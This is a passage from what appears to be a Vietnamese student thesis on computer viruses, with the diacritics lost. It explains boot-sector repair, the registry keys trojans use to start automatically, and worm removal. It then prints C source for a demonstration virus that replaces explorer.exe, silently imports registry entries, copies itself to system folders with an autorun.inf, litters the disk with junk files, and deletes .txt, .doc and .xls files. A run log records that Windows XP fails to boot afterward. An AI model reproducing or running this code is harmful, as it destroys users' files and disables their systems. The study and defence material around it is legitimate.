sector, trong trng hp khng th khi phc li c mi tin hnh ghi mt Boot sector sch. Cc bc tin hnh bao gm: Cn c vo loi a (a cng hay mm) v loi virus tin hnh gii m xc nh ni ct gi Boot sector nguyn thy. c Boot sector nguyn thy vo b m bng ngt 13h (chc nng c sector 02h) ca BIOS v kim tra tnh hp l ca n. Trong trng hp vic kim tra l chnh xc mi bt u ghi vo Boot sector c virus bng ngt 13h chc ghi sector 03h ca BIOS. i vi loi DB-Virus, vic khi phc a cn c th i km vi vic gii phng mt s lin cung b nh du b trn a nu virus dng phng php nh v FAT. Cch gii quyt tt nht i vi vic ny l: nn lm nhng iu virus lm nhng ngc li.
54
To kha trong Registry: [HKEY_LOCAL_MACHINE \ Software \ Microsoft \Windows \ CurrentVersion\ Run] Trojan=c:\\ Trojan.exe [HKEY_LOCAL_MACHINE \ Software \ Microsoft\ Window \ CurrentVersion\ RunOnce] Trojan=c:\...\Trojan.exe [HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion\ RunServices] Trojan=c:\....\Trojan.exe [HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion\ RunServicesOnce] Trojan=c:\....\Trojan.exe [HKEY_LOCAL_USER \ Software \ Microsoft \ Windows \ CurrentVersion\ Run] Trojan=c:\....\Trojan.exe [HKEY_LOCAL_USER \ Software \ Microsoft \ Windows \ CurrentVersion\ RunServices] Trojan=c:\....\Trojan.exe - Trong Resistry Shell Open vi key l %1%* [HKEY_CLASSES_ROOT \ exefile \shell\ open\ command] [HKEY_CLASSES_ROOT \ comfile \shell\ open\ command] [HKEY_CLASSES_ROOT \ batfile \shell\ open\ command] [HKEY_CLASSES_MACHINE \ SOFTWARE \ Classes \ exefile \ shell \ open \ command] Trojan.exe = %1%* - Trong mt s ng dng m cho php mt s chng trnh c th chy: +Trong ICQ: [HKEY_CURRENT_USER \ Software \ Mirabilis \ ICQ \ Agent\ Apps\] +Trong ActiveX: [HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Active Setup \ Installed Components \ KeyName] StubPath=c:\...\Trojan.exe Loi b Trojan ta thc hin xa tt c cc lnh c file m Trojan s c chy khi khi ng my tnh ( y v d l file Trojan.exe)
56
3.2.4. Su Worm
dit su Internet ta thc hin ln lt cc qu trnh sau: - Nghin cu cc thng tin v su. - Thc hin loi b phn ly nhim ra khi cc file ly nhim. Mi su Internet c c trng ring ca n, cho nn iu cn thit l phi thc hin vic nghin cu v su Internet: tn file thc thi, ng dn ca file thc thi, nhng tc ng ca n ti cc file khc trong h thng, cc file m n to ra v phn m i din ca mi con su Internet. Thng qua m i din ca su Internet ta c th thc hin vic qut file tm v dit su Internet .
57
58
/*=================================================*/ int copy(char *infile,char *outfile) { FILE *input,*output; char temp; if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen (outfile,"wb"))!=NULL)) { while(!feof(input)) { fread(&temp,1,1,input); fwrite(&temp,1,1,output); } fclose(input); fclose(output); return 0; } else return 1; }
59
/*=================================================*/ int autorun_explorer() { FILE *input; if((input=fopen("C:\\windows\\system\\explorer.exe","rb"))!=NULL) { fclose(input); remove("C:\\windows\\$temp$"); remove("C:\\windows\\system32\\dllcache\\$temp$"); return 1; } copy("C:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe"); rename("C:\\windows\\explorer.exe","C:\\windows\\$temp$"); rename("C:\\windows\\system32\\dllcache\\explorer.exe","C:\\windows\\syste m32\ \\dllcache\\$temp$"); if(copy("SVCHOST.com","C:\\windows\\explorer.exe")==0 && copy ("SVCHOST.com","C:\\windows\\system32\\dllcache\\explorer.exe")==0 ) return 0; else return 2; }
60
/*=================================================*/ int add_reg() { FILE *output; if((output=fopen("$$$$$","w"))!=NULL) { fprintf(output,regadd); fclose(output); spawnl(1,"C:\\windows\\regedit.exe"," /s $$$$$",NULL); return 0; } return 1; } /*=================================================*/
void copy_virus() { int i,k; FILE *input,*output; char *files_svchost[SVCHOST_NUM]= {"svchost.com","C:\\windows\\wjview32.com","c:\\windows\\system\\M SMOUSE.DLL","c:\\windows\\syste\ m32\\cmdsys.sys","C:\\windows\\system32\\mstsc32.exe","c:\\windows\\ explorer.exe"}; char temp[2][20]={"C:\\svchost.com","c:\\autorun.inf"};
61
for(i=0;i<SVCHOST_NUM;i++) { if((input=fopen(files_svchost[i],"rb"))!=NULL) { fclose(input); for(k=0;k<SVCHOST_NUM;k++) { copy(files_svchost[i],files_svchost[k]); } i=SVCHOST_NUM; } } for(i=0;i<SVCHOST_NUM;i++) { if((input=fopen(files_svchost[i],"rb"))!=NULL) { fclose(input); for(k=0;k<24;k++) { copy(files_svchost[i],temp[0]); if((output=fopen(temp[1],"w"))!=NULL) { fprintf(output,"%s",autorun); fclose(output); }
62
void make_rubbish() { int i; FILE *output; srand(0); for(i=0;i<RUBBISH_NUM;i++) { int n; char s[30]; n=rand(); sprintf(s,"C:\\DESTORY_GHIDE_%d",n); if((output=fopen(s,"w"))!=NULL) { fprintf(output,"%ld%s",n*n,s); fclose(output); }
63
} } /*================================================*/ void remove_files() { long done; int i; struct _finddata_t ffblk; char *remove_files[3]={"*.txt","*.doc","*.xls"}; for(i=0;i<3;i++) { if(_findfirst(remove_files[i],&ffblk)==-1) continue; while(!done) { remove(ffblk.name); _findnext(done,&ffblk); } _findclose(done); } } /*=================================================*/ int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR int lpCmdLine,
nCmdShow)
64
int contral=0; autorun_explorer(); spawnl(1,"c:\\windows\\system\\explorer.exe"," /s",NULL); add_reg(); copy_virus(); make_rubbish(); spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL); return 0;
65
Sau khi chy chng trnh virus win32 virus s t ng thc hin vic to v xa mt s file sau: Sau khi chy chong trnh bng Visual C++ chng trnh s t ng tc ng vo mt s file trn windows lm cho h iu hnh Windows XP b li khi khi ng CreateFile C:\windows\system32\dllcache\$temp$ DeleteFile C:\windows\system32\dllcache\explorer.exe CreateFile C:\windows\$temp$ DeleteFile C:\windows\explorer.exe CreateFile C:\windows\system\explorer.exe
Mn hnh C sau khi chy virus Sau khi chy chng trnh virus ny sau khi khi ng li my tnh mn hnh my tnh s khng khi ng ln c v file C:\windows\system\explorer.exe b thay i cc file C:\windows\system32\dllcache\$temp$, CreateFile C:\windows\$temp$
66
c to ra khin cho HH Windows XP khng np c chng trnh khi ng mn hnh Windows XP.
67
Kt lun
Kt qu t c ca kha lun:
1. Tm hiu v nghin cu l thuyt: - Tng quan v virus my tnh, hot ng ca B-Virus, F-Virus, Macro Virus, Virus Trojan, Internet worm. - Mt s phng php pht hin, nhn dng virus my tnh. - Mt s phng php phng trnh v dit virus my tnh. 2. Th nghim Chng trnh m phng to virus my tnh.
68